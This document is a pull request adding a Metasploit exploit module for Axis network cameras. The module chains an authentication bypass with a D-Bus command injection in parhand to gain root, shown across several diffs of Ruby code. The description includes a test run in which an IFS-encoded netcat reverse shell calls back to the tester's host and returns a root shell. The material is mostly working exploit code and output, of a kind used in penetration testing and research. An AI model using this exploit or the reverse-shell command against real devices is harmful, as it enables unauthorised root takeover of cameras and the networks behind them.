### PR TITLE
Add root exploit for Axis network cameras

### DIFF
--- a/modules/exploits/linux/http/axis_srv_parhand_rce.rb
+++ b/modules/exploits/linux/http/axis_srv_parhand_rce.rb
@@ -44,7 +44,11 @@ class MetasploitModule < Msf::Exploit::Remote
          'Platform'    => 'unix',
          'Arch'        => ARCH_CMD,
          'Type'        => :unix_memory,
-         'Payload'     => {'BadChars' => ' ', 'Encoder' => 'cmd/ifs'}
+         'Payload'     => {
+           'BadChars'  => ' ',
+           'Encoder'   => 'cmd/ifs',
+           'Compat'    => {'PayloadType' => 'cmd', 'RequiredCmd' => 'netcat-e'}
+         }
         ],
 =begin
         ['Linux Dropper',

--- a/modules/exploits/linux/http/axis_srv_parhand_rce.rb
+++ b/modules/exploits/linux/http/axis_srv_parhand_rce.rb
@@ -8,11 +8,11 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStager
+  #include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Axis Camera .srv/parhand RCE',
+      'Name'           => 'Axis Network Camera .srv to parhand RCE',
       'Description'    => %q{
         This module exploits an auth bypass in .srv functionality and a
         command injection in parhand to execute code as the root user.
@@ -36,23 +36,26 @@ class MetasploitModule < Msf::Exploit::Remote
       ],
       'DisclosureDate' => 'Jun 18 2018',
       'License'        => MSF_LICENSE,
-      'Platform'       => ['unix', 'linux'],
-      'Arch'           => [ARCH_CMD, ARCH_ARMLE],
+      'Platform'       => ['unix'],# 'linux'],
+      'Arch'           => [ARCH_CMD],# ARCH_ARMLE],
       'Privileged'     => true,
       'Targets'        => [
         ['Unix In-Memory',
          'Platform'    => 'unix',
          'Arch'        => ARCH_CMD,
          'Type'        => :unix_memory,
-         'Payload'     => {'BadChars' => ' '}
+         'Payload'     => {'BadChars' => ' ', 'Encoder' => 'cmd/ifs'}
         ],
+=begin
         ['Linux Dropper',
          'Platform'    => 'linux',
          'Arch'        => ARCH_ARMLE,
          'Type'        => :linux_dropper
         ]
+=end
       ],
-      'DefaultTarget'  => 0
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'}
     ))
   end
 
@@ -60,24 +63,25 @@ class MetasploitModule < Msf::Exploit::Remote
     case target['Type']
     when :unix_memory
       execute_command(payload.encoded)
+=begin
     when :linux_dropper
-      # TODO: Make this work
       execute_cmdstager
+=end
     end
   end
 
   def execute_command(cmd, opts = {})
     rand_srv = "#{Rex::Text.rand_text_alphanumeric(8..42)}.srv"
 
-    vprint_status(cmd)
-
     send_request_cgi(
       'method'    => 'POST',
       'uri'       => "/index.html/#{rand_srv}",
       'vars_post' => {
         'action'  => 'dbus',
-        # TODO: Break down this line
-        'args'    => "--system --dest=com.axis.PolicyKitParhand --type=method_call /com/axis/PolicyKitParhand com.axis.PolicyKitParhand.SetParameter string:root.Time.DST.Enabled string:;#{cmd};"
+        'args'    => dbus_send(
+          method: :set_param,
+          param:  "string:root.Time.DST.Enabled string:;#{cmd};"
+        )
       }
     )
 
@@ -86,10 +90,24 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri'       => "/index.html/#{rand_srv}",
       'vars_post' => {
         'action'  => 'dbus',
-        # TODO: Break down this line
-        'args'    => "--system --dest=com.axis.PolicyKitParhand --type=method_call /com/axis/PolicyKitParhand com.axis.PolicyKitParhand.SynchParameters"
+        'args'    => dbus_send(method: :synch_params)
       }
     )
+  end
+
+  def dbus_send(method:, param: nil)
+    args = '--system --dest=com.axis.PolicyKitParhand ' \
+           '--type=method_call /com/axis/PolicyKitParhand '
+
+    args <<
+      case method
+      when :set_param
+        "com.axis.PolicyKitParhand.SetParameter #{param}"
+      when :synch_params
+        'com.axis.PolicyKitParhand.SynchParameters'
+      end
+
+    args
   end
 
 end

--- a/modules/exploits/linux/http/axis_srv_parhand_rce.rb
+++ b/modules/exploits/linux/http/axis_srv_parhand_rce.rb
@@ -20,10 +20,10 @@ class MetasploitModule < Msf::Exploit::Remote
       'Author'         => [
         'Or Peles',       # Vulnerability discovery (VDOO)
         'wvu',            # Metasploit module
+        'sinn3r',         # Metasploit module
         'Brent Cook',     # Metasploit module
         'Jacob Robles',   # Metasploit module
         'Matthew Kienow', # Metasploit module
-        'Wei Chen',       # Metasploit module
         'Shelby Pace',    # Metasploit module
         'Chris Lee',      # Metasploit module
         'Cale Black'      # Metasploit module

--- a/modules/exploits/linux/http/axis_srv_parhand_rce.rb
+++ b/modules/exploits/linux/http/axis_srv_parhand_rce.rb
@@ -1,0 +1,95 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Axis Camera .srv/parhand RCE',
+      'Description'    => %q{
+        This module exploits an auth bypass in .srv functionality and a
+        command injection in parhand to execute code as the root user.
+      },
+      'Author'         => [
+        'Or Peles',       # Vulnerability discovery (VDOO)
+        'wvu',            # Metasploit module
+        'Brent Cook',     # Metasploit module
+        'Jacob Robles',   # Metasploit module
+        'Matthew Kienow', # Metasploit module
+        'Wei Chen',       # Metasploit module
+        'Shelby Pace',    # Metasploit module
+        'Chris Lee',      # Metasploit module
+        'Cale Black'      # Metasploit module
+      ],
+      'References'     => [
+        ['CVE', '2018-10660'],
+        ['CVE', '2018-10661'],
+        ['CVE', '2018-10662'],
+        ['URL', 'https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/']
+      ],
+      'DisclosureDate' => 'Jun 18 2018',
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['unix', 'linux'],
+      'Arch'           => [ARCH_CMD, ARCH_ARMLE],
+      'Privileged'     => true,
+      'Targets'        => [
+        ['Unix In-Memory',
+         'Platform'    => 'unix',
+         'Arch'        => ARCH_CMD,
+         'Type'        => :unix_memory,
+         'Payload'     => {'BadChars' => ' '}
+        ],
+        ['Linux Dropper',
+         'Platform'    => 'linux',
+         'Arch'        => ARCH_ARMLE,
+         'Type'        => :linux_dropper
+        ]
+      ],
+      'DefaultTarget'  => 0
+    ))
+  end
+
+  def exploit
+    case target['Type']
+    when :unix_memory
+      execute_command(payload.encoded)
+    when :linux_dropper
+      # TODO: Make this work
+      execute_cmdstager
+    end
+  end
+
+  def execute_command(cmd, opts = {})
+    rand_srv = "#{Rex::Text.rand_text_alphanumeric(8..42)}.srv"
+
+    vprint_status(cmd)
+
+    send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => "/index.html/#{rand_srv}",
+      'vars_post' => {
+        'action'  => 'dbus',
+        # TODO: Break down this line
+        'args'    => "--system --dest=com.axis.PolicyKitParhand --type=method_call /com/axis/PolicyKitParhand com.axis.PolicyKitParhand.SetParameter string:root.Time.DST.Enabled string:;#{cmd};"
+      }
+    )
+
+    send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => "/index.html/#{rand_srv}",
+      'vars_post' => {
+        'action'  => 'dbus',
+        # TODO: Break down this line
+        'args'    => "--system --dest=com.axis.PolicyKitParhand --type=method_call /com/axis/PolicyKitParhand com.axis.PolicyKitParhand.SynchParameters"
+      }
+    )
+  end
+
+end


### PR DESCRIPTION
# ~WIP~ Unblocked for this sprint

Currently only `cmd/unix/{reverse,bind}_netcat_gaping` (BusyBox) work. I'm specifying the `cmd/ifs` encoder manually at the moment.

**To-do:**

- [x] Perform badchar analysis on the injection and investigate other vectors
- [ ] ~Investigate randomizing the order/syntax of D-Bus arguments~ It's a network camera

```
msf5 exploit(linux/http/axis_srv_parhand_rce) > run

[*] Started reverse TCP handler on 192.168.1.55:4444
[*] nc${IFS}192.168.1.55${IFS}4444${IFS}-e${IFS}/bin/sh${IFS}
[*] Command shell session 1 opened (192.168.1.55:4444 -> 192.168.1.51:54316) at 2018-07-12 18:50:36 -0500

id
uid=0(root) gid=0(root)
uname -a
Linux axis-accc8e6991f9 4.1.0 #1 PREEMPT Thu Jul 7 11:06:57 CEST 2016 armv7l GNU/Linux
```

Tested on a **Companion Dome V** with version **6.15.4**.